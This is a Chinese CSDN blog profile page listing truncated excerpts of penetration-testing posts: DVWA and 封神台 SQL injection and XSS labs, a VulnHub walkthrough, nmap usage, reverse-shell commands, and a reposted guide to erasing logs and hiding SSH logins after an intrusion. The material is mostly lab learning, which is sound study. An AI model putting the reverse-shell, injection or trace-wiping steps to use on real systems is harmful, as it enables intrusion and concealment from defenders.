原味瓜子、
码龄7年
关注
提问 私信
  • 博客:55,003
    55,003
    总访问量
  • 36
    原创
  • 1,785,533
    排名
  • 24
    粉丝
  • 0
    铁粉
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:浙江省
  • 加入CSDN时间: 2018-01-24
博客简介:

原味瓜子、的博客

查看详细资料
个人成就
  • 获得84次点赞
  • 内容获得4次评论
  • 获得270次收藏
  • 代码片获得243次分享
创作历程
  • 28篇
    2020年
  • 4篇
    2019年
  • 11篇
    2018年
成就勋章
TA的专栏
  • SQL注入
    3篇
  • Future
  • VulnHub渗透测试
    1篇
  • 附件集
    7篇
  • DVWA
    12篇
  • web入门
    5篇
兴趣领域 设置
  • 网络空间安全
    系统安全
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

封神台SQL注入-基础靶场1-Head注入

1111
原创
发布博客 2020.10.10 ·
1161 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

封神台SQL注入-基础靶场1-布尔盲注

1
原创
发布博客 2020.10.09 ·
1652 阅读 ·
1 点赞 ·
0 评论 ·
3 收藏

VulnHub渗透测试-Bulldog2

文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现三、漏洞利用、GetShell四、权限提升,得到Flag五、种植后门、清理痕迹渗透步骤一、主机发现、端口扫描//主机发现root@kali:~# ifconfigroot@kali:~# nmap -sn 192.168.56.1/24//端口扫描,获取服务、系统版本信息root@kali:~# nmap -sV -O 192.168.56.104//目录扫描root@kali:~# dirb http://192.168.
原创
发布博客 2020.09.30 ·
354 阅读 ·
1 点赞 ·
0 评论 ·
2 收藏

Linux 入侵痕迹清理技巧

文章目录01、清除history历史命令记录02、清除系统日志痕迹03、清除web入侵痕迹04、文件安全删除工具05、隐藏远程SSH登陆记录在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。01、清除history历史命令记录查看历史操作命令:查看历史操作命令:historyhistory记录文件:more ~/.bash_history第一种方式:(1)编辑history记录文件,
转载
发布博客 2020.09.30 ·
1367 阅读 ·
1 点赞 ·
0 评论 ·
6 收藏

nmap基本使用方法

1、nmap简单扫描nmap默认发送一个ARP的PING数据包,来探测目标主机1-10000范围内所开放的所有端口命令语法: nmap <target ip address>其中:target ip address是扫描的目标主机的ip地址例子:nmap 173.22.90.10[root@docker-node4 ~]# nmap 173.22.90.10PORT STATE SERVICE22/tcp open ssh 80/tcp open http111
转载
发布博客 2020.09.29 ·
870 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

linux反弹shell命令解析

文章目录1. 什么是反弹shell2. 反弹shell的用途3. 反弹shell操作步骤4. 原理1. 什么是反弹shell简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。2. 反弹shell的用途这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子,所以才来研究这家伙3. 反弹shell操作步骤3.1. 在本机开启端口9090nc -lk 90903.2. 在需要被控制的机器上执行如下两种命令中的一种即可bash -i >& /
转载
发布博客 2020.09.29 ·
2305 阅读 ·
5 点赞 ·
0 评论 ·
8 收藏

BurpSuite系列----Proxy模块(代理模块)

文章目录一、简介二、模块说明1.Intercept2.HTTP History3.WebSockets history4.Options一、简介Proxy代理模块作为BurpSuite的核心功能,拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Burp 代理允许你通过监视和操纵应用程序传输的关键参数和其他数据来查找和探索应用程序的漏洞。通过以恶意的方式修改浏览器的请求,Burp 代理可以用来进行攻击,如:SQL 注入,cooki
转载
发布博客 2020.09.29 ·
669 阅读 ·
0 点赞 ·
0 评论 ·
3 收藏

封神台SQL注入-基础靶场1-显错注入

一、显错注入Pass-01判断注入类型id=1 //有回显id=1' // No results found 判断为数字型注入判断有几列id=1 order by 3 //有回显id=1 order by 4 // No results found 判断有三列判断回显点id=1 union select 1,2,3...
原创
发布博客 2020.09.28 ·
1433 阅读 ·
4 点赞 ·
0 评论 ·
12 收藏

sql注入中关于“--+“,“--“和“#“

使用#号有时发现执行的sql语句中没有#号原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#将#号改成url的编码%23就可以了使用--和使用--+这里发现+号在语句中变成了空格。用来和后面的单引号分隔开,将后面的语句注释。了解原理后便知道了--无法使用的原因,是因为--与后面的单引号连接在一起,无法形成有效的mysql语句。在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合所以在注入时我们除了使用--+
转载
发布博客 2020.09.28 ·
6095 阅读 ·
15 点赞 ·
1 评论 ·
26 收藏

如何判断是字符型注入还是数字型注入

前言通常sql 注入漏洞会被分为2种类型数值型字符型其实所有产生类型都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类型限制,而不同的数据库有不同的数据类型,不管我们怎么分常用的数据类型总是以数值和字符来进行区分的。如何区分1)数字型当输入的参数x为整型的时候,通常sql语句是这样的select * from users where id =x这种类型可以使用经典的and 1=1 and 1=2来判断url地址中输入www.xxxx.com/ccc.php?i
转载
发布博客 2020.09.28 ·
9561 阅读 ·
32 点赞 ·
1 评论 ·
111 收藏

DVWA-JS攻击

文章目录JavaScript攻击一、Low等级二、Medium等级三、High等级Impossible等级JavaScript攻击属于Web前端安全,不存在黑盒测试的概念,直接可以对JS进行白盒代码审计。DVWA中的JavaScript攻击的场景是基于token由前端JS生成而引起的一系列问题。成功提交success,即过关一、Low等级1、漏洞分析尝试输入success,会显示invalid token生成token的源码function rot13(inp) {
原创
发布博客 2020.09.25 ·
516 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

DVWA-CSP绕过内容安全策略

文章目录CSP一、Low等级二、medium等级三、High等级四、Impossible等级CSP指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。CSP的实质就是白名单制度,开发人员明确告诉客户端,哪些外部资源可以加载和执行。开发者只需要提供配置,实现和执行全部由浏览器完成。启用CSP通过HTTP相应头信息的Content-Security-Policy字段通过网页标签说明script-src脚本:只信任当前域名object-src:不
原创
发布博客 2020.09.25 ·
532 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

渗透测试中的端口利用

文章目录端口渗透图解详解端口渗透我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞。端口渗透图解详解端口渗透文件共享端口渗透FTP服务FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等。默认端口20(
转载
发布博客 2020.09.24 ·
2558 阅读 ·
4 点赞 ·
0 评论 ·
57 收藏

DVWA-XSS(Reflected+Stored)

文章目录XSS-Reflected反射型一、各等级漏洞分析及利用XSS-Stored存储型一、各等级漏洞分析及利用XSS-Reflected反射型把用户输入的数据反射给浏览器,诱使用户点击一个恶意链接,才能攻击成功。一、各等级漏洞分析及利用Low等级,没做任何过滤直接弹medium等级,过滤掉<script>,用空替换掉大小写、过滤规则漏洞利用,使用其他标签high等级,匹配一些<script>的关键字符,进一步过滤<script>
原创
发布博客 2020.09.24 ·
349 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

DVWA-XSS(DOM)G

文章目录XSS的应用场景DOM型XSS一、Low等级二、Medium等级三、High等级XSS的应用场景利用XSS获得cookie重定向钓鱼网站DDOSDOM型XSS文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。一、Low等级1、漏洞分析<?php# No protections, anything goes?> 没任何保护2.漏洞利用2.1重定向<script>window.loca
原创
发布博客 2020.09.23 ·
173 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

04信息搜集

1、信息搜集的思路和方法思路服务器的配置信息和网站的敏感信息域名和子域名信息目标网络系统开放的端口指纹方法网络架构系统前端后端中间键知道域名后,我们需要知道目标的注册信息DNS服务器信息注册人的联系信息获取方法whois查询:kali自带或在线查询(whois.chinaz.com)备案信息查询:https://www.tianyancha.com/Dnsenum/Layer收集子域名信息寻找真实IP判断是否存在cdn。(www.17ce.com
原创
发布博客 2020.09.24 ·
224 阅读 ·
0 点赞 ·
0 评论 ·
1 收藏

DVWA- Weak Session IDs 弱会话ID

文章目录弱会话ID一、Low等级二、Medium等级三、High等级四、Impossible等级弱会话ID用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。一个SessionID就对应一个客户端,用户拿到session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了。但是 session id 过于简单就会容易被人伪造,根本都不需要知道用户的密码就能登录服务器了。一、Low等级1、漏洞分析&l
原创
发布博客 2020.09.23 ·
419 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

DVWA-SQL Injection 注入&Sqlmap

文章目录SQL注入一、Low等级二、Medium等级三、High等级四、ImpossibleSQL注入指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。一、Low等级1、漏洞分析 <?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
原创
发布博客 2020.09.22 ·
485 阅读 ·
0 点赞 ·
0 评论 ·
4 收藏

DVWA-Insecure CAPTCHE 不安全的验证流程

文章目录不安全的验证流程一、Low等级二、Medium等级四、impossible等级不安全的验证流程一、Low等级1、漏洞分析if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) { // Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'],
原创
发布博客 2020.09.22 ·
362 阅读 ·
0 点赞 ·
0 评论 ·
0 收藏

DVWA-File Upload 文件上传W

文章目录文件上传一、Low等级二、Medium等级三、High等级四、Impossible文件上传由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限一、Low等级1、漏洞分析 <?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT
原创
发布博客 2020.09.21 ·
373 阅读 ·
0 点赞 ·
0 评论 ·
2 收藏
加载更多